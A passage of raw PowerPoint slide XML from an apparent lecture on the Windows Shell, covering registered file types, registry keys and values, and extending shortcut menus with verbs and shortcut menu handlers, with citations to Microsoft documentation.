              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is not a member of a registered file type.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="投影片編號版面配置區 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1AE96A04-6FFE-4647-B1EB-FABF2537EC88}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="screen shot of the default shortcut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2856"/>
            <a:ext cx="4256625"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277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076056" y="2780928"/>
            <a:ext cx="3816424" cy="3312368"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is a registered file type. If you right-click a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, then you see a shortcut menu with three additional commands in its upper section: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Edit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Open with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Shortcut Menu for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Registered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="投影片編號版面配置區 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1AE96A04-6FFE-4647-B1EB-FABF2537EC88}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2052" name="Picture 4" descr="screen shot of the shortcut menu for a file with a registered file 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61021"/>
            <a:ext cx="4231010" cy="465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142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7732381" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Sometimes, the presence of a key is all the data that an application requires; other times, an application opens a key and uses the values associated with the key. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>key can have any number of values, and the values can be in any form. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>more information, see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Registry Value Types</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Registry Element Size Limits</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7</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Functions of a Key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4618276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8020413" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>To extend the shortcut menu for a file type, you must create a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>registry entry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>for each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>more sophisticated approach is to implement a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>shortcut menu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>verb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, which allows you to extend the shortcut menu for a file type on a file-by-file basis. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>more information, see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Creating Context Menu Handlers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Context Menu Reference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Extend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Shortcut Menu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="投影片編號版面配置區 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1AE96A04-6FFE-4647-B1EB-FABF2537EC88}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="955334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en-US" altLang="zh-TW" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>shortcut menu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>verb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>handler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>file type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>that adds </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to an existing shortcut </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>menu.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Shortcut </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>menu handlers are associated with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>file type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, and are called whenever a shortcut menu is displayed for a member of the class. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> checks the registry to see if the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>file type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is associated with any shortcut menu handlers. If it is, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> queries the handlers for additional shortcut menu items.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Shortcut Menu Handler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="投影片編號版面配置區 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1AE96A04-6FFE-4647-B1EB-FABF2537EC88}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24215027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Each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> on the shortcut menu is identified in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>registry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> by its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>verb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>verb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is a simple text string that is used by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to identify the associated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>verb corresponds to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>the command string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
